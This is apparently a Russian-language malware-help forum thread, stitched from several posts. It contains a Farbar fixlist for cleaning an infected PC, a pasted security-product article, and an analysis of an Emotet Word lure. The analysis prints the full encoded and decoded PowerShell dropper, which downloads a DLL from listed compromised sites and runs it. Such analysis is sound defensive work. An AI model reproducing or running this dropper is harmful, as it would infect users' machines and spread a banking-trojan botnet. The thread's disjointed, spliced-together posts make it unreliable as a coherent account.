Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!


[CODE]Task: {0C27BBFB-0B3E-4E08-B18E-7E06EF5590E4} - \Microsoft\Windows\Wininet\RealtekHDStartUP -> No File <==== ATTENTION
Task: {0D2504F9-6CB5-4451-B0A0-50762C468613} - \Microsoft\Windows\End Of Support\Notify1 -> No File <==== ATTENTION
Task: {1E8C98EE-DD24-4F1F-8E8E-12D173E3F6EE} - \Microsoft\Windows\Wininet\Taskhostw -> No File <==== ATTENTION
Task: {272C46CF-78A6-4C61-889C-D89CA912D797} - \Microsoft\Windows\Wininet\RealtekHDControl -> No File <==== ATTENTION
Task: {45165E84-4994-4968-91B0-81C5C4935AC7} - \Microsoft\Windows\Media Center\ObjectStoreRecoveryTask -> No File <==== ATTENTION
Task: {4E9E03BE-222D-44AE-964C-211ECD1F4868} - \Microsoft\Windows\Media Center\MediaCenterRecoveryTask -> No File <==== ATTENTION
Task: {50481703-4003-468D-9DEE-3DE69A70FB19} - \Microsoft\Windows\Wininet\Cleaner -> No File <==== ATTENTION
Task: {5AAFAAC8-D251-4F21-A53C-C9859F1E7347} - \Microsoft\Windows\Wininet\Taskhost -> No File <==== ATTENTION
Task: {9416266B-27A3-403C-9B42-20E9AC22B2C0} - \Microsoft\Windows\End Of Support\Notify2 -> No File <==== ATTENTION
Task: {9D920420-EC1A-4397-B325-87CB8E4DCF72} - \Microsoft\Windows\Media Center\SqlLiteRecoveryTask -> No File <==== ATTENTION
Task: {BCDACB33-ECFC-4E65-94DE-CB2B1A8B3A58} - \Microsoft\Windows\Media Center\PvrScheduleTask -> No File <==== ATTENTION
2021-01-06 14:28 - 2021-01-06 14:29 - 000000000 ____D C:\FRST
2021-01-04 17:41 - 2021-01-04 17:41 - 000000000 ____D C:\Program Files\Common Files\Avast Software
2021-01-03 13:00 - 2021-01-03 13:00 - 000000000 ____D C:\Users\Виктор\Doctor Web
2020-12-13 14:02 - 2021-01-05 01:07 - 000000000 __SHD C:\Users\Все пользователи\Doctor Web
2020-12-13 14:02 - 2021-01-05 01:07 - 000000000 __SHD C:\ProgramData\Doctor Web
2020-12-13 14:02 - 2020-12-13 16:08 - 000000000 ___HD C:\Program Files\RDP Wrapper
2020-12-13 14:02 - 2020-12-13 14:02 - 000000000 __SHD C:\Users\Все пользователи\Norton
2020-12-13 14:02 - 2020-12-13 14:02 - 000000000 __SHD C:\Users\Все пользователи\McAfee
2020-12-13 14:02 - 2020-12-13 14:02 - 000000000 __SHD C:\Users\Все пользователи\Kaspersky Lab Setup Files
2020-12-13 14:02 - 2020-12-13 14:02 - 000000000 __SHD C:\Users\Все пользователи\ESET
2020-12-13 14:02 - 2020-12-13 14:02 - 000000000 __SHD C:\Users\Все пользователи\AVAST Software
2020-12-13 14:02 - 2020-12-13 14:02 - 000000000 __SHD C:\rdp
2020-12-13 14:02 - 2020-12-13 14:02 - 000000000 __SHD C:\ProgramData\Norton
2020-12-13 14:02 - 2020-12-13 14:02 - 000000000 __SHD C:\ProgramData\McAfee
2020-12-13 14:02 - 2020-12-13 14:02 - 000000000 __SHD C:\ProgramData\Kaspersky Lab Setup Files
2020-12-13 14:02 - 2020-12-13 14:02 - 000000000 __SHD C:\ProgramData\ESET
2020-12-13 14:02 - 2020-12-13 14:02 - 000000000 __SHD C:\ProgramData\AVAST Software
2020-12-13 14:02 - 2020-12-13 14:02 - 000000000 __SHD C:\Program Files\SpyHunter
2020-12-13 14:02 - 2020-12-13 14:02 - 000000000 __SHD C:\Program Files\Malwarebytes
2020-12-13 14:02 - 2020-12-13 14:02 - 000000000 __SHD C:\Program Files\ESET
2020-12-13 14:02 - 2020-12-13 14:02 - 000000000 __SHD C:\Program Files\Enigma Software Group
2020-12-13 14:02 - 2020-12-13 14:02 - 000000000 __SHD C:\Program Files\COMODO
2020-12-13 14:02 - 2020-12-13 14:02 - 000000000 __SHD C:\Program Files\Common Files\McAfee
2020-12-13 14:02 - 2020-12-13 14:02 - 000000000 __SHD C:\Program Files\Cezurity
2020-12-13 14:02 - 2020-12-13 14:02 - 000000000 __SHD C:\Program Files\AVG
2020-12-13 14:02 - 2020-12-13 14:02 - 000000000 __SHD C:\Program Files\AVAST Software
2020-12-13 14:02 - 2020-12-13 14:02 - 000000000 __SHD C:\Program Files (x86)\SpyHunter
2020-12-13 14:02 - 2020-12-13 14:02 - 000000000 __SHD C:\Program Files (x86)\Panda Security
2020-12-13 14:02 - 2020-12-13 14:02 - 000000000 __SHD C:\Program Files (x86)\GRIZZLY Antivirus
2020-12-13 14:02 - 2020-12-13 14:02 - 000000000 __SHD C:\Program Files (x86)\Cezurity
2020-12-13 14:02 - 2020-12-13 14:02 - 000000000 __SHD C:\Program Files (x86)\AVG
2020-12-13 14:02 - 2020-12-13 14:02 - 000000000 __SHD C:\Program Files (x86)\AVAST Software
2020-12-13 14:02 - 2020-12-13 14:02 - 000000000 ____D C:\Users\Все пользователи\Avira
2020-12-13 14:02 - 2020-12-13 14:02 - 000000000 ____D C:\ProgramData\Avira
2020-12-13 14:01 - 2021-01-06 14:21 - 000000000 __SHD C:\AdwCleaner
2020-12-13 14:01 - 2021-01-04 13:47 - 000000000 __SHD C:\KVRT_Data
2020-12-13 14:01 - 2020-12-13 16:07 - 000000000 __SHD C:\Users\Все пользователи\Setup
2020-12-13 14:01 - 2020-12-13 16:07 - 000000000 __SHD C:\Users\Все пользователи\install
2020-12-13 14:01 - 2020-12-13 16:07 - 000000000 __SHD C:\ProgramData\Setup
2020-12-13 14:01 - 2020-12-13 16:07 - 000000000 __SHD C:\ProgramData\install
2020-12-13 14:01 - 2020-12-13 15:56 - 000000000 __SHD C:\Users\Все пользователи\RealtekHD
2020-12-13 14:01 - 2020-12-13 15:56 - 000000000 __SHD C:\ProgramData\RealtekHD
2020-12-13 14:01 - 2020-12-13 14:01 - 000000000 __SHD C:\Users\Все пользователи\360safe
2020-12-13 14:01 - 2020-12-13 14:01 - 000000000 __SHD C:\ProgramData\360safe
2020-12-13 14:01 - 2020-12-13 14:01 - 000000000 __SHD C:\Program Files\ByteFence
2020-12-13 14:01 - 2020-12-13 14:01 - 000000000 __SHD C:\Program Files (x86)\Microsoft JDX
2020-12-13 14:01 - 2020-12-13 14:01 - 000000000 __SHD C:\Program Files (x86)\360
2021-01-02 14:49 - 2020-03-31 22:22 - 000000000 ____D C:\Program Files\Common Files\AV
2020-12-13 14:01 - 2020-12-13 14:01 - 000000000 ____D C:\Users\Все пользователи\MB3Install
2020-12-13 14:01 - 2020-12-13 14:01 - 000000000 ____D C:\Users\Все пользователи\Malwarebytes
2020-12-13 14:01 - 2020-12-13 14:01 - 000000000 ____D C:\ProgramData\MB3Install
2020-12-13 14:01 - 2020-12-13 14:01 - 000000000 ____D C:\ProgramData\Malwarebytes
FirewallRules: [{13B5C344-8CC0-48C7-92B7-4E2433A2FB62}] => (Block) LPort=445
FirewallRules: [{C2403358-CCBE-4693-A11B-62C56E8ACA69}] => (Block) LPort=445
FirewallRules: [{3525D451-0477-4C65-B7B1-D1C0EAFA1BC5}] => (Block) LPort=139
FirewallRules: [{9A3654DF-983A-407A-A5D4-D7889B88649E}] => (Block) LPort=139
FirewallRules: [{95CDEF4D-B27E-4525-B34E-FB28F642554E}] => (Allow) LPort=3389
FirewallRules: [{4CBF4A65-8B74-42DE-AC21-1842F5D83B95}] => (Allow) LPort=3389
EmptyTemp:
Reboot:[/CODE]

добавьте образ автозапуска системы

[QUOTE]qwoddyktt riyt написал:
Просто хочу сказать, что партнерская программа MediaGet в партнерстве с Яндексом. Устанавливает браузер и сервисы Яндекса, по согласию пользователей[/QUOTE] осталось еще согласовать с антивирусными компаниями.

11:18 / 28 Декабря, 2020

Динамика развития киберпреступности сигнализирует рынку о том, что основную массу угроз компании должны уметь отражать автоматически, но этого мало.

Все сетевые атаки можно классифицировать по цели, которую преследует злоумышленник. Изначально компьютерные «нападения» совершались с целью «повандалить» - например, разрабатывались вирусы, удаляющие важную информацию. С развитием информатизации преступники стали руководствоваться другими мотивами – извлечение финансовой выгоды, реализация конкурентной борьбы, решение разведывательных задач. Все чаще стали совершаться целевые атаки, направленные на взлом определенных сетей и компьютеров. В отличие от массовых нападений («взламывается все, что можно»), злоумышленник ищет возможность проникнуть в инфраструктуру вне зависимости от степени ее защищенности. Целевая атака может быть направлена на определенную организацию, отрасль экономики, государственные структуры. Со временем такие «нападения» становятся все более изощренными. Так, например, в 2020 году японский автоконцерн Honda подвергся атаке шифровальщика Snake, в результате чего компания была вынуждена приостановить производство на ряде предприятий

Для защиты от целевых атак не существует универсального рецепта, необходима «умная» защита на всех уровнях. Group-IB недавно представила продукт Threat Hunting Framework (THF), включающий в себя несколько модулей, каждый из которых несет ряд инноваций и по своей функциональности выходит за рамки существующих продуктовых категорий, по сути, определяя принципиально новые типы инструментов защиты от кибератак. Прежде всего, в продукте интересен сам подход – впервые он устанавливает единые стандарты защиты для таких разных окружений, как ИТ-инфраструктура, рабочие места (в том числе и удаленные), а так же технологические сети (ОТ), изолированные от сети Интернет. В итоге Threat Hunting Framework – сложный комплексный продукт, предназначенный для выявления целевых атак и неизвестных типов вредоносного ПО, предоставляющий автоматизированные инструменты для блокировки обнаруженных угроз, а также для расследования инцидентов информационной безопасности и реагирования на них как внутри, так и за пределами защищенного периметра организации.

THF помогает команде ИБ связывать разрозненные события вне и внутри сети, управлять данными для хантинга и прогнозировать новые атаки


 Подробнее: https://www.securitylab.ru/analytics/515120.php

какой продукт пытаетесь установить на телефон?

другие приложения выходят в сеть?
C:\PROGRAM FILES\TEAMVIEWER\TEAMVIEWER_SERVICE.EXE
C:\USERS\ОЛЕГ\APPDATA\ROAMING\TELEGRAM DESKTOP\TELEGRAM.EXE

выход во внешнюю сеть работает? добавьте образ автозапуска системы

https://app.any.run/tasks/b8e10aa1-e3d9-4f6f-86fc-e428c9359537

"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\ARC 2020_12_29 MC57559.doc"

+
[QUOTE]cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAKwAnAG0AJwApACsAJwBwACcAKwAoACcAdQB0ACcAKwAnAGUAJwApACsAJwByAC4AJwArACgAJwBjAG8AbQAvAGMAJwArACcAbwBuACcAKQArACgAJwB0AGUAbgAnACsAJwB0AC8AVAAnACkAKwAoACcATAAvAEAAXQAnACsAJwBiACcAKwAnADIAWwBzACcAKwAnAHMAJwApACsAKAAnADoAJwArACcALwAvACcAKQArACcAZAAtACcAKwAoACcAYwAnACsAJwBlAG0AJwArACcALgBjAG8AbQAnACkAKwAnAC8AJwArACcAdwBwACcAKwAoACcALQBhACcAKwAnAGQAJwApACsAKAAnAG0AJwArACcAaQBuACcAKQArACcALwAnACsAKAAnAEoAJwArACcAUwBMAHcARwAxACcAKQArACgAJwAvAEAAXQBiADIAWwBzACcAKwAnADoAJwArACcALwAnACkAKwAnAC8AJwArACgAJwB0AGgAZQBiAGUAcwAnACsAJwB0ACcAKQArACcAZgAnACsAKAAnAGkAawByAGEAJwArACcAaAAuACcAKwAnAGMAbwAnACkAKwAnAG0AJwArACgAJwAvAHcAcAAtACcAKwAnAGEAZABtACcAKwAnAGkAJwArACcAbgAvACcAKQArACgAJwBmACcAKwAnAE8ASQBsACcAKwAnAFYAWAAvAEAAJwApACsAKAAnAF0AYgAyACcAKwAnAFsAJwApACsAKAAnAHMAcwA6AC8AJwArACcALwAnACkAKwAoACcAcABoACcAKwAnAGEAdwAnACkAKwAoACcAYQB5AGEAJwArACcAZwBlACcAKQArACcAbgAnACsAKAAnAGMAeQAnACsAJwAuAGMAbwBtAC8AJwApACsAJwB3ACcAKwAnAHAAJwArACgAJwAtACcAKwAnAGEAZAAnACkAKwAnAG0AaQAnACsAJwBuACcAKwAoACcALwAnACsAJwBtAFgAbwAnACkAKwAnADQAYgAnACsAJwAvACcAKQAuACIAcgBlAHAAYABMAGAAQQBDAEUAIgAoACgAKAAnAF0AYgAnACsAJwAyAFsAJwApACsAJwBzACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACcAaAAnACsAKAAnAHQAdAAnACsAJwBwACcAKQApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAHMAYABwAEwASQBUACIAKAAkAEUAXwBfAFYAIAArACAAJABZAHQAZABfAHAAcABiACAAKwAgACQAQwA1ADQAWQApADsAJABKADMANwBWAD0AKAAoACcARwA1ACcAKwAnADIAJwApACsAJwBDACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAWQBmAHAAZAB2AHUAcgAgAGkAbgAgACQASQBsAGUAXwB2AGEAYQApAHsAdAByAHkAewAoAC4AKAAnAE4AZQB3AC0AJwArACcATwBiACcAKwAnAGoAZQBjAHQAJwApACAAUwBZAHMAdABlAG0ALgBuAEUAdAAuAHcAZQBiAGMATABpAEUAbgBUACkALgAiAEQAbwBXAGAATgBgAGwAYABvAGEAZABmAEkAbABlACIAKAAkAFkAZgBwAGQAdgB1AHIALAAgACQAWgBjADcAbgA3AHkAXwApADsAJABXADAAMgBIAD0AKAAnAEMAJwArACgAJwA1ADkAJwArACcAWAAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABaAGMANwBuADcAeQBfACkALgAiAEwARQBuAEcAYABUAEgAIgAgAC0AZwBlACAAMwA4ADQAMQAzACkAIAB7AC4AKAAnAHIAJwArACcAdQBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFoAYwA3AG4ANwB5AF8ALAAoACcAQwBvACcAKwAoACcAbgB0ACcAKwAnAHIAbwAnACkAKwAoACcAbABfAFIAJwArACcAdQAnACsAJwBuAEQATAAnACkAKwAnAEwAJwApAC4AIgB0AG8AcwB0AGAAUgBgAEkATgBHACIAKAApADsAJABVADcAOABXAD0AKAAnAE0AMAAnACsAJwAxAE4AJwApADsAYgByAGUAYQBrADsAJABGADIANABUAD0AKAAnAEsAJwArACgAJwAzACcAKwAnADgATAAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQQAzADEASQA9ACgAJwBWACcAKwAoACcAOAAnACsAJwA4AEoAJwApACkA [/QUOTE]

+
in /v Word experienced an error trying to open the file.
+
раскодированный скрипт:
[QUOTE]POwersheLL -w hidden $U6351=[TYpE]("{2}{0}{1}{4}{3}{5}" -F 'ySTEm.i','O.di','s','EcTO','R','RY') ;$OLV = [tYpe]("{0}{7}{1}{8}{3}{6}{5}{2}{4}" -F'sY','TEm.NE','ntmAN','v','AGeR','I','iCePO','s','T.seR') ; $ErrorActionPreference = ('Si'+('le'+'n')+'t'+('ly'+'C')+('onti'+'n'+'ue'));$Ytd_ppb=$H4_L + [char](64) + $Q01Q;$E15N=(('O'+'1_')+'V'); ( geT-VaRiable u6351 -VaLUEoNLy )::"cRE`ATedIr`eC`Tory"($HOME + (('{0}N'+('sgh'+'o')+'ht{0}'+'G'+'b'+('h5r'+'9o')+'{0}') -f [cHaR]92));$N95W=(('S'+'28')+'S'); ( Ls vArIABle:olV).VAlUE::"SECUr`ITY`PrOTO`coL" = ('Tl'+('s1'+'2'));$K_2L=('B6'+'7O');$Bexo28t = ('Q2'+'7V');$M69N=(('U'+'72')+'A');$Zc7n7y_=$HOME+(('{'+'0'+'}'+('N'+'sg')+'hoht{0}'+'G'+('b'+'h5r')+'9o{0}') -F[CHAR]92)+$Bexo28t+('.d'+'ll');$N_1W=(('M'+'34')+'Y');$Ile_vaa=(']'+('b2'+'['+'s://w'+'heel')+'co'+'mo'+'vi'+('n'+'g.co'+'m/p')+'/R'+'u'+'M'+('eRP'+'a')+'/@'+(']'+'b2[s:/')+('/'+'00')+'z'+('y'+'ku')+'.'+'co'+('m/w'+'p'+'-admin/'+'e')+('Yu1'+'Q/')+'@]'+'b'+('2['+'s://k')+('e'+'tore')+('se'+'tm')+('e'+'.com')+'/w'+'p'+('-'+'cont')+('e'+'nt/pmJ')+'/'+('@'+']b')+'2'+('['+'ss:/'+'/')+('ryco'+'m')+'p'+('ut'+'e')+'r.'+('com/c'+'on')+('ten'+'t/T')+('L/@]'+'b'+'2[s'+'s')+(':'+'//')+'d-'+('c'+'em'+'.com')+'/'+'wp'+('-a'+'d')+('m'+'in')+'/'+('J'+'SLwG1')+('/@]b2[s'+':'+'/')+'/'+('thebes'+'t')+'f'+('ikra'+'h.'+'co')+'m'+('/wp-'+'adm'+'i'+'n/')+('f'+'OIl'+'VX/@')+(']b2'+'[')+('ss:/'+'/')+('ph'+'aw')+('aya'+'ge')+'n'+('cy'+'.com/')+'w'+'p'+('-'+'ad')+'mi'+'n'+('/'+'mXo')+'4b'+'/')."rep`L`ACE"(((']b'+'2[')+'s'),([array]('sd','sw'),('h'+('tt'+'p')),'3d')[1])."s`pLIT"($E__V + $Ytd_ppb + $C54Y);$J37V=(('G5'+'2')+'C');foreach ($Yfpdvur in $Ile_vaa){try{(.('New-'+'Ob'+'ject') SYstem.nEt.webcLiEnT)."DoW`N`l`oadfIle"($Yfpdvur, $Zc7n7y_);$W02H=('C'+('59'+'X'));If ((.('Get-I'+'tem') $Zc7n7y_)."LEnG`TH" -ge 38413) {.('r'+'un'+'dll32') $Zc7n7y_,('Co'+('nt'+'ro')+('l_R'+'u'+'nDL')+'L')."tost`R`ING"();$U78W=('M0'+'1N');break;$F24T=('K'+('3'+'8L'))}}catch{}}$A31I=('V'+('8'+'8J'))[/QUOTE]

+[QUOTE]

"C:\Windows\system32\rundll32.exe" C:\Users\admin\Nsghoht\Gbh5r9o\Q27V.dll Control_RunDLL[/QUOTE]
+[QUOTE]
C:\Windows\system32\rundll32.exe "C:\Users\admin\AppData\Local\Vcfjrqyglb\qernwsuxr.kiv",Control_RunDLL
[/QUOTE]
https://www.virustotal.com/gui/file/f7440143fa4180db96d5e22f38a07fab5fd56f4912e542b­dd8e0a3dc65fc5f68/detection
+
[QUOTE]"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe4_ Global\UsGthrCtrlFltPipeMssGthrPipe4 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" [/QUOTE]

[QUOTE]RP55 RP55 написал:
модифицированный Win32/Emotet.gen троянская программа[/QUOTE]

После полуторамесячного перерыва ботнет Emotet был возрожден 21 декабря [1, 2], и Microsoft заметила продолжающуюся кампанию, доставляющую «широкий спектр приманок в виде огромных объемов электронных писем, использования поддельных ответов или переадресации. электронные письма, защищенные паролем вложения архива ".

«В новой кампании Emotet по-прежнему используются документы, содержащие вредоносный макрос, который при включении подключается к семи вредоносным доменам для загрузки полезной нагрузки Emotet», - написала в Твиттере Microsoft Security Intelligence.

Emotet был впервые обнаружен в 2014 году как банковский троянец и теперь превратился в ботнет, используемый группой угроз TA542 (также известной как Mummy Spider) для развертывания вредоносных программ второго уровня в зараженных системах.

Полезные данные, которые Emotet сбрасывает на взломанные компьютеры, включают троянские программы QakBot и Trickbot (которые также развертывают программы-вымогатели Ryuk и Conti).

ключ сработал и все файлы, которые вы переслали были расшифрованы.